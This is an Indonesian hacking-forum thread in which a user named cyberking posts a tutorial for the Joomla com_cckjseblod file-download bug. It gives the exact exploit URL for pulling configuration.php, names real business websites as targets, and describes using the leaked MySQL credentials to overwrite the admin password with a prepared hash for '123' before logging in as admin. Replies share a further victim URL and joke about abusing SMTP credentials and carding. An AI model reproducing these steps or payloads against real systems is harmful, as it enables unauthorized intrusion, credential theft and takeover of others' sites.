[Share] Vuln Joomla with option=com_cckjseblod
#11
:v SMTP oh SMTP :v
come on with papa :v
Joss tutornya om Cyb3rking
YM: root.keylock
ICQ: 694929999 

#12
(11-05-2015, 01:25 AM)keylock Wrote: :v SMTP oh SMTP :v
come on with papa :v
Joss tutornya om Cyb3rking

partai carder ini pasti

#13
(11-05-2015, 01:01 AM)hehehe Wrote: sobat siberrking emang ngerii di dunia maya :v

makasih bro...dicicipin dlu trik nya

ini juga http://www[dot]starmarketingonline[dot]com/index.php?option=com_cckjseblod&task=download&file=configuration.php

gurihh =))

#14
(11-04-2015, 10:44 PM)hamdan_zenith Wrote: enggak semua bisa di remote mysql yaa om ? :/
tapi keren tutornya omm,, josss

lah iya kagak haha, salah satu tekniknya remote mysql jika bisa, alo gabisa mainin smtpnya, kalo gabisa juga, liat passnya terus check emailnya, hubungin semuanya pokoknya banyak cara, apasih yang gabisa? wkwkw


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#15
(11-05-2015, 12:05 AM)djoe Wrote:
(11-04-2015, 10:44 PM)hamdan_zenith Wrote: enggak semua bisa di remote mysql yaa om ? :/
tapi keren tutornya omm,, josss
iya , biasanya yang servernya linux , ngak bisa di remote dari client (dari luar enviroment nya) bisa jadi karen di blok sama firewall Big Grin

bukan cuma di blok ama firewall, tp emang settingan standart ga di allow utk akses dari luar harus dari dalam =))
cmiiw


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#16
(11-05-2015, 01:01 AM)hehehe Wrote: sobat siberrking emang ngerii di dunia maya :v

makasih bro...dicicipin dlu trik nya

ini juga http://www[dot]starmarketingonline[dot]com/index.php?option=com_cckjseblod&task=download&file=configuration.php

dapet aja cess haha :p


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#17
(11-05-2015, 01:25 AM)keylock Wrote: :v SMTP oh SMTP :v
come on with papa :v
Joss tutornya om Cyb3rking

wuakakak ngerti dahh yang biasa manfaatin smtp =))


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#18
(11-05-2015, 01:28 AM)deepz0ne Wrote:
(11-05-2015, 01:25 AM)keylock Wrote: :v SMTP oh SMTP :v
come on with papa :v
Joss tutornya om Cyb3rking

partai carder ini pasti

hushh jangan ngomngin itu disini gaboleh haha private aja wakaka =))
kaburr


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#19
(11-04-2015, 02:45 PM)cyberking Wrote: Selamat Siang =))
kali ini kita sharing tentang bug di option jomla yaitu com_cckjseblod, sekilas ane bacanya ccktusbol wkwkw =))
ternyata salah

oke nemu target www[dot]athenameetings[dot]com
entah kenapa target di lingkup bisnis terus..

jadi gini, pada bug tersebut kita dapat melakukan download file configuration.php yang pada dasarnya merupakan file config joomla, nah di dalam file tersebut ada data FTP, MYSQL, SMPT dll, yang kerennya di web ini ane nemu smtp nya yang gogle, jadi masuk ke gmail, dan parahnya gmailnya butuh verifikasi lagi huhuhu

[Image: qVFIzZj.png]

gambar : http://i.imgur.com/qVFIzZj.png

make bahasa aneh, ane ga ngerti walau ada translate juga wkwk

oke langsung aja untuk download file configurasinya seperti ini:
sitetarget.com/pathjoomlanya/index.php?option=com_cckjseblod&task=download&file=configuration.php

nah contoh dari taget ane gini :
www.athenameetings.com/index.php?option=com_cckjseblod&task=download&file=configuration.php

dan w00t!! dapet file configurationnya Big Grin
oke lanjut lagi ngapain cuma sampe disitu, kentang (kenyang tanggung) namanya ahahah

kita lihat isi file configuration.php tersebut

[Image: DtpvQAz.png]

gambar: http://i.imgur.com/DtpvQAz.png

nah dari email mah uda liat kan gimana haha ane bisa masuk tp butuh jawab pertanyaan lagi nih, sekarang kita masuk ke mysqlnya aja wakakak

[Image: 4i5gEBP.png]

gambar: http://i.imgur.com/4i5gEBP.png

dan w00tt bisa masuk euy wakakak sekarang ngapain?
check aja tables jos_users nya dulu kan itu table super admin joomla..

[Image: YHPe0Cq.png]

gambar: http://i.imgur.com/YHPe0Cq.png

hayoloo passwordnya wkwk
udeh gausa pusing, kita ganti aja passwordnya dengan password standart 123 di hash ke joomla, jadi gini:
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT

[Image: IK13ISz.png]

gambar: http://i.imgur.com/IK13ISz.png

nahh tinggal login dah:
user: admin
pass: 123

[Image: DFAI1Fx.png]

w00t!! g0t it!!

terus mau ngapain ? wakakak cari tau ndiri deh haha

josss bangg

#20
Wah mantep, makasih kakak cyberking Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~






Users browsing this thread: 1 Guest(s)